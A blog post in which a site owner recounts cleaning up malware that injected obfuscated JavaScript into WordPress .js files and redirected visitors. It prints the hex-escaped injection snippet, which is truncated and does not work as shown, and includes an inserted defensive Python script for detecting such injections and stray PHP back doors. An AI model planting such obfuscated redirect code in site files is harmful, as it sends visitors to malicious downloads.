var _0xaae8 — jQuery Malware redirecting Wordpress sites

Thomas Wooldridge
Jun 8, 2017 · 3 min read

There is a nasty piece of malware that is hacking WordPress websites. The malware randomly redirects EVERY page to other websites that host malicious downloads to infect users' systems.

This virus is attacking the jQuery.js files. Normally core WordPress files are pretty secure if you constantly update your software. But it's rather difficult to manage multiple different websites with WordPress.

I typically don't allow auto-update because it has caused my sites to go down, but at the same time that leaves my sites open to WP vulnerabilities.


I found 3 sites that had a redirect on the whole site. I checked my .htaccess and didn't see anything strange. So I installed a virus/malware scanner plugin called Wordfence, and the results were astounding.

* File appears to be malicious: wp-admin/js/bookmarklet.js

* File appears to be malicious: wp-admin/js/bookmarklet.min.js

* File appears to be malicious: wp-admin/js/color-picker.js

* File appears to be malicious: wp-admin/js/color-picker.min.js

* File appears to be malicious: wp-admin/js/comment.js

* File appears to be malicious: wp-admin/js/comment.min.js

* File appears to be malicious: wp-admin/js/custom-header.js

* File appears to be malicious: wp-admin/js/customize-controls.js

* File appears to be malicious: wp-admin/js/customize-controls.min.js

* File appears to be malicious: wp-admin/js/customize-nav-menus.js

* File appears to be malicious: wp-admin/js/customize-nav-menus.min.js

* File appears to be malicious: wp-admin/js/customize-widgets.js

* File appears to be malicious: wp-admin/js/customize-widgets.min.js

* File appears to be malicious: wp-admin/js/edit-comments.js

* File appears to be malicious: wp-admin/js/edit-comments.min.js

* File appears to be malicious: wp-admin/js/editor-expand.js

* File appears to be malicious: wp-admin/js/editor-expand.min.js

* File appears to be malicious: wp-admin/js/editor.js

* File appears to be malicious: wp-admin/js/editor.min.js

* File appears to be malicious: wp-admin/js/gallery.js

* File appears to be malicious: wp-admin/js/gallery.min.js

* File appears to be malicious: wp-admin/js/image-edit.js

* File appears to be malicious: wp-admin/js/image-edit.min.js

* File appears to be malicious: wp-admin/js/inline-edit-post.js

* File appears to be malicious: wp-admin/js/inline-edit-post.min.js

* File appears to be malicious: wp-admin/js/inline-edit-tax.js

Of course this was only a snippet of the infected files; basically all of the .js files were exploited. This included core WP, plugins, and themes.

Looking at the source code, they all had this:

//var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//

The easiest way to fix this is to just overwrite the files with a fresh, clean copy of WordPress.

This actually worked for 1 day.

The infection of all the jQuery files came back. Apparently there was a sneaky .php back door file that the attacker was using. My concern was whether this code was injected on the public web side or in the database.
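Two things a responder wants at this point are a way to read what the hex-escaped array above actually spells out, and a way to find every file that differs from a clean copy, including a stray .php back door like the one that caused the re-infection. The following Python script is an added example, not the author's tooling or anything from WordPress or Wordfence; the live-site and clean-unpack paths are assumed arguments, and the sample line is copied from the post exactly as printed above.

```python
"""Triage helper for the hex-escaped JS injection (added example, not the author's code)."""
import hashlib
import os
import re

# Obfuscator-style string array: var _0x<hex> = ["...", "..."]
HEX_ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]')
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')
# Sample copied from the post as printed there (array is short and the call truncated).
SAMPLE = r'//var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//'

def decode_hex_escapes(s):
    """Turn "\\x6A\\x6F\\x69\\x6E" into "join" so the DOM method names become readable."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)

def find_injections(js_source):
    """Return [(array_name, decoded_strings)] for each hex-escaped string array."""
    hits = []
    for name, body in HEX_ARRAY_RE.findall(js_source):
        raw = STRING_RE.findall(body)
        # Plain string arrays are normal JS; only hex-escaped ones are suspect.
        if any(HEX_ESC_RE.search(s) for s in raw):
            hits.append((name, [decode_hex_escapes(s) for s in raw]))
    return hits

def _sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def triage_site(site_root, clean_root):
    """Flag injected .js files, files differing from the clean unpack, and stray .php files."""
    injected, changed, stray_php = {}, [], []
    for dirpath, _, files in os.walk(site_root):
        for fn in files:
            live = os.path.join(dirpath, fn)
            rel = os.path.relpath(live, site_root)
            if fn.endswith(".js"):
                with open(live, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    injected[rel] = hits
            clean = os.path.join(clean_root, rel)
            if not os.path.exists(clean):
                if fn.endswith(".php"):
                    stray_php.append(rel)  # a back door would typically show up here
            elif _sha256(clean) != _sha256(live):
                changed.append(rel)
    return injected, changed, stray_php
```

Run `triage_site("/var/www/site", "/tmp/wordpress-clean")` (assumed paths) after unpacking a fresh WordPress of the same version into the clean directory; wp-content files not in the clean tree are expected to be absent there, so only the stray .php list is reported for them.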

The final solution, to be 100% sure, was to delete EVERYTHING on the server and do a clean install. I know this is a pain, but it's the only solution I had. Luckily I had a backup of all my content and it didn't take too long.

So far after 48 hours the solution still seems to be working.

In the meantime I will continue to apply this to the other infected sites, and I have set a much stronger password and stricter CHMOD directory permissions. Hopefully this solves the problem.


Originally published at Thomas Wooldridge.

Thomas Wooldridge

Written by

Expanding my Territory in the Digital Age! #ProjectManager #SocialMedia #Marketing Follow #twool9 blog http://thomaswooldridge.com Portfolio http://relamark.com
